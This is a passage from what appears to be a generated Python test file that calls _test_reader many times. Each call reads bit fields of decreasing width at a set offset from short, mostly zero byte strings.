_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 24, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 23, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 22, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 21, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 20, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 19, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 18, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 17, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 16, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 15, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 14, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 13, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 12, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 11, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 10, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 9, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 4, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 32, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 31, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 30, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 29, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 28, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 27, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 26, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 25, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 24, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 23, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 22, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 21, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 20, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 19, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 18, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 17, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 15, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 14, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 13, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 12, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 11, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 10, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 9, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 32, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 31, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 30, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 29, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 28, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 27, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 26, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 25, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 24, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 23, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 22, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 21, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 20, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 19, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 18, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 17, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 16, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 15, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 14, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 13, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 12, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 11, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 10, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 9, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 32, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 31, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 30, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 29, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 28, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 27, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 26, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 25, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 24, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 23, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 22, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 21, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 20, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 19, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 18, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 17, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 16, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 15, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 14, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 13, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 12, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 11, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 10, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 9, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 32, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 31, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 30, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 29, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 28, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 27, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 26, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 25, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 24, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 23, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 22, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 21, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 20, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 19, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 18, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 17, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 16, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 15, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 14, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 13, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 12, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 11, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 10, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 9, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 64, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 63, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 62, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 61, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 60, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 59, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 58, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 57, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 56, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 55, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 54, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 53, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 52, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 51, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 50, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 49, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 48, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 47, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 46, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 45, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 44, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 43, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 42, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 41, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 40, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 39, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 38, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 37, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 36, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 35, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 34, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 33, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 32, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 31, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 30, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 29, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 28, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 27, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 26, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 25, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 24, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 23, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 22, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 21, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 20, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 19, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 18, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 17, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 16, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 15, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 14, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 13, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 12, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 11, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 10, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 9, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 64, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 63, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 62, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 61, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 60, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 59, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 58, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 57, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 56, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 55, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 54, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 53, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 52, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 51, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 50, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 49, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 48, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 47, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 46, False, 1)
